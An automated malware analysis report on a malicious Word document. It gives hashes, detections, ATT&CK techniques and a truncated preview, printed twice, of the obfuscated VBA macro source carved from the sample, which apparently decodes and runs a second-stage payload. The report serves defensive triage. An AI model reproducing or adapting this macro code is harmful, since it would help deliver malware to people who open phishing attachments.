Office (OLE) malware analysis — malicious · 07a3355f81ff69a1

MALICIOUS

Office (OLE)

115.5 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 92d66a5f165c57fe24e23dfe526da0bf SHA-1: d1bcd9d1fe52715025740fca312a9782981f64d8 SHA-256: 07a3355f81ff69a197c792847d0783bfc336181d66d3a36e6b548d0dbd9f5a9a

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing VBA macros. The macros appear to be obfuscated but include calls to GetObject and CallByName, suggesting an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Valyria-9761059-0' further supports its malicious nature. The embedded URL is benign and likely a false positive.

Heuristics 5

ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40391 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40391 bytes
SHA-256: `b728a984c32843f87c0e1f5b4454f954cdb5b1c06067569d4de30979a10ca826`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "sub1, 0, 0, MSForms, Frame" Dim let64, let99(2) As Byte, let35(9) As Byte, let60(32) As Byte, let55(19) As Byte, let86(13) As Byte, let11(6) As Byte, let27(55) As Byte, let72(1269) As Byte, let01(5) As Byte, let82(19) As Byte, let77(19) As Byte, let00(1 To 255) As Byte Private Sub let97() let77(1) = let00(65) let77(4) = let00(65) let77(17) = let00(51) let77(16) = let00(55) let77(15) = let00(68) let77(2) = let00(52) let77(11) = let00(56) let77(5) = let00(55) let77(3) = let00(49) let77(8) = let00(55) let77(14) = let00(66) let77(10) = let00(57) let77(12) = let00(52) let77(9) = let00(65) let77(19) = let00(51) let77(0) = let00(51) let77(13) = let00(66) let77(18) = let00(70) let77(7) = let00(57) let77(6) = let00(55) End Sub Private Function let42() Dim let34, let70, let06, let90() As Byte, let66, let31 let31 = 1 While let31 <= (-2483 + 2738) let00(let31) = let31 let31 = let31 + 1 Wend let97 let10 let66 = (6092 - 5836) let89 While let70 = 0 let90 = CStr(let34) let06 = let73(let90()) If let06 >= 1 Then let11(2) = let90(0) + (let90(1) * let66) If let06 >= 3 Then let11(3) = let90(2) + (let90(3) * let66) If let06 >= 5 Then let11(4) = let90(4) + (let90(5) * let66) If let06 >= 7 Then let11(5) = let90(6) + (let90(7) * let66) If let06 >= 9 Then let11(6) = let90(8) + (let90(9) * let66) End If End If End If End If End If If let05(let02(let82(), let92(let11()), 19), let77, 19) = 1 Then let70 = 162 End If let34 = let34 + 1 Wend If let70 = 162 Then let09 Else MsgBox let70 End If End Function Private Function let94(let03) Dim let33(1) As Byte, let50, let40, let07 If let03 > (91545 / 359) Then let50 = let1(let03, (-7012 + 7268)) let07 = let03 / (1588224 / 6204) let40 = let07 Else let50 = let03 End If let33(0) = let50 let33(1) = let40 let94 = let33 End Function Private Sub let04() let72(677) = let00(86) let72(1249) = let00(14) let72(1253) = let00(101) let72(314) = let00(69) let72(234) = let00(32) let72(59) = let00(241) let72(789) = let00(126) let72(1154) = let00(41) let72(473) = let00(244) let72(1093) = let00(183) let72(624) = let00(113) let72(1262) = let00(133) let72(1177) = let00(50) let72(522) = let00(28) let72(259) = let00(74) let72(973) = let00(32) let72(198) = let00(133) let72(115) = let00(125) let72(185) = let00(124) let72(168) = let00(238) let72(324) = let00(224) let72(18) = let00(204) let72(1267) = let00(142) let72(299) = let00(38) let72(678) = let00(13) let72(1042) = let00(30) let72(913) = let00(204) let72(438) = let00(59) let72(36) = let00(113) let72(949) = let00(48) let72(780) = let00(156) let72(1189) = let00(179) let72(129) = let00(219) let72(738) = let00(170) let72(819) = let00(210) let72(29) = let00(83) let72(451) = let00(154) let72(90) = let00(77) let72(736) = let00(247) let72(609) = let00(12) let72(405) = let00(201) let72(74) = let00(48) let72(362) = let00(147) let72(840) = let00(90) let72(4) = let00(170) let72(542) = let00(229) let72(959) = let00(222) let72(870) = let00(23) let72(412) = let00(3) let72(698) = let00(168) let72(760) = let00(39) let72(875) = let00(49) let72(786) = let00(158) let72(562) = let00(186) let72(593) = let00(145) let72(914) = let00(142) let72(635) = let00(37) let72(988) = let00(252) let72(399) = let00(110) let72(1063) = let00(163) let72(391) = let00(251) let72(839) = let00(83) let72(649) = let00(216) let72(1012) = let00(85) let72(240) = let00(83) let72(14) = let00(192) let72(360) = let00(224) let72(527) = let00(59) let72(202) = let00(82) let72(1102) = let00(235) let72(759) = let00(108) let72(1099) = let00(211) let72(340) = let00(137) let72(81) = let00(75) let72(833) = let00(130) let72(970) = let00(225) let72(564) = let00(56) let72(940) = let00(212) ... (truncated)

SHA-256: b728a984c32843f87c0e1f5b4454f954cdb5b1c06067569d4de30979a10ca826

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim let64, let99(2) As Byte, let35(9) As Byte, let60(32) As Byte, let55(19) As Byte, let86(13) As Byte, let11(6) As Byte, let27(55) As Byte, let72(1269) As Byte, let01(5) As Byte, let82(19) As Byte, let77(19) As Byte, let00(1 To 255) As Byte
Private Sub let97()
let77(1) = let00(65)
let77(4) = let00(65)
let77(17) = let00(51)
let77(16) = let00(55)
let77(15) = let00(68)
let77(2) = let00(52)
let77(11) = let00(56)
let77(5) = let00(55)
let77(3) = let00(49)
let77(8) = let00(55)
let77(14) = let00(66)
let77(10) = let00(57)
let77(12) = let00(52)
let77(9) = let00(65)
let77(19) = let00(51)
let77(0) = let00(51)
let77(13) = let00(66)
let77(18) = let00(70)
let77(7) = let00(57)
let77(6) = let00(55)
End Sub
Private Function let42()
Dim let34, let70, let06, let90() As Byte, let66, let31
let31 = 1
While let31 <= (-2483 + 2738)
let00(let31) = let31
let31 = let31 + 1
Wend
let97
let10
let66 = (6092 - 5836)
let89
While let70 = 0
let90 = CStr(let34)
let06 = let73(let90())
If let06 >= 1 Then
let11(2) = let90(0) + (let90(1) * let66)
If let06 >= 3 Then
let11(3) = let90(2) + (let90(3) * let66)
If let06 >= 5 Then
let11(4) = let90(4) + (let90(5) * let66)
If let06 >= 7 Then
let11(5) = let90(6) + (let90(7) * let66)
If let06 >= 9 Then
let11(6) = let90(8) + (let90(9) * let66)
End If
End If
End If
End If
End If
If let05(let02(let82(), let92(let11()), 19), let77, 19) = 1 Then
let70 = 162
End If
let34 = let34 + 1
Wend
If let70 = 162 Then
let09
Else
MsgBox let70
End If
End Function
Private Function let94(let03)
Dim let33(1) As Byte, let50, let40, let07
If let03 > (91545 / 359) Then
let50 = let1(let03, (-7012 + 7268))
let07 = let03 / (1588224 / 6204)
let40 = let07
Else
let50 = let03
End If
let33(0) = let50
let33(1) = let40
let94 = let33
End Function
Private Sub let04()
let72(677) = let00(86)
let72(1249) = let00(14)
let72(1253) = let00(101)
let72(314) = let00(69)
let72(234) = let00(32)
let72(59) = let00(241)
let72(789) = let00(126)
let72(1154) = let00(41)
let72(473) = let00(244)
let72(1093) = let00(183)
let72(624) = let00(113)
let72(1262) = let00(133)
let72(1177) = let00(50)
let72(522) = let00(28)
let72(259) = let00(74)
let72(973) = let00(32)
let72(198) = let00(133)
let72(115) = let00(125)
let72(185) = let00(124)
let72(168) = let00(238)
let72(324) = let00(224)
let72(18) = let00(204)
let72(1267) = let00(142)
let72(299) = let00(38)
let72(678) = let00(13)
let72(1042) = let00(30)
let72(913) = let00(204)
let72(438) = let00(59)
let72(36) = let00(113)
let72(949) = let00(48)
let72(780) = let00(156)
let72(1189) = let00(179)
let72(129) = let00(219)
let72(738) = let00(170)
let72(819) = let00(210)
let72(29) = let00(83)
let72(451) = let00(154)
let72(90) = let00(77)
let72(736) = let00(247)
let72(609) = let00(12)
let72(405) = let00(201)
let72(74) = let00(48)
let72(362) = let00(147)
let72(840) = let00(90)
let72(4) = let00(170)
let72(542) = let00(229)
let72(959) = let00(222)
let72(870) = let00(23)
let72(412) = let00(3)
let72(698) = let00(168)
let72(760) = let00(39)
let72(875) = let00(49)
let72(786) = let00(158)
let72(562) = let00(186)
let72(593) = let00(145)
let72(914) = let00(142)
let72(635) = let00(37)
let72(988) = let00(252)
let72(399) = let00(110)
let72(1063) = let00(163)
let72(391) = let00(251)
let72(839) = let00(83)
let72(649) = let00(216)
let72(1012) = let00(85)
let72(240) = let00(83)
let72(14) = let00(192)
let72(360) = let00(224)
let72(527) = let00(59)
let72(202) = let00(82)
let72(1102) = let00(235)
let72(759) = let00(108)
let72(1099) = let00(211)
let72(340) = let00(137)
let72(81) = let00(75)
let72(833) = let00(130)
let72(970) = let00(225)
let72(564) = let00(56)
let72(940) = let00(212)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.